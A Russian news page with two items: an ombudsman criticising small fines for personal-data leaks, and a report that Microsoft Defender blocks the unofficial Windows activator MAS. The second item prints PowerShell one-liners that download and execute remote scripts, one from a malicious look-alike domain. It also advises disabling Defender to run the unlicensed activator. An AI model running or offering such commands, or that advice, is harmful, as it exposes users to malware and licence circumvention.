Омбудсмен по правам человека назвала штрафы за утечки смешными

Омбудсмен по правам человека назвала штрафы за утечки смешными

Омбудсмен по правам человека назвала штрафы за утечки смешными

Уполномоченный по правам человека призвала ужесточить наказания за утечки данных. Татьяна Москалькова назвала сегодняшние штрафы смешными и рекомендовала гражданам смотреть, что они подписывают.

Свою озабоченность низкими штрафами за “утечки” госпожа Москалькова высказала на полях Восточного Экономического Форума, который завершается сегодня во Владивостоке.

Ответственность за разглашение персональных данных в РФ смешная, нужно жестко реализовывать наработки законодателей, заявила уполномоченный по правам человека агентству РИА Новости. Она отметила, что закон о персональных данных совершенствуется каждый год в зависимости от запросов общества, но о человеке можно свободно собрать любые данные: купить базу ГИБДД или поликлиники.

"Это крайне опасное явление, и те наработки, которые сегодня нам предлагают законодатели, нужно реализовать в правоприменительной практике очень жестко, — считает Москалькова. — Сегодня ответственность просто смешная за разглашение персональных данных".

По мнению омбудсмена, человек должен иметь возможность распоряжаться данными о себе, чтобы никто ни при каких условиях без его согласия не мог придавать публичности даже достоверную информацию о нем.

При этом Москалькова не уточняла, должна ли касаться подобная норма политиков, чиновников и публичных персон.

"С другой стороны, мы должны, наверное, научиться жить в этой реальности и научиться сами распоряжаться данными о себе. По крайней мере, научиться читать то, что нам подсовывают для подписи, написанное мелким почерком в поликлиниках, больницах и в других местах", — добавила омбудсмен.

Накануне стало известно, что август поставил очередной антирекорд по утечкам данных российских пользователей. В последний месяц лета в Сеть выложили 100 баз.

Первого сентября в силу вступили поправки в закон “О персональных данных”. Оператор ПДн обязан сообщать об утечках и кибератаках в первые сутки после обнаружения. Еще два дня дают на внутреннюю проверку. Сами штрафы за утечки еще прорабатываются. По последней информации, платить процентом от годового оборота придется при потере данных более 10 тыс. пользователей. Документ обещают показать в середине сентября.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru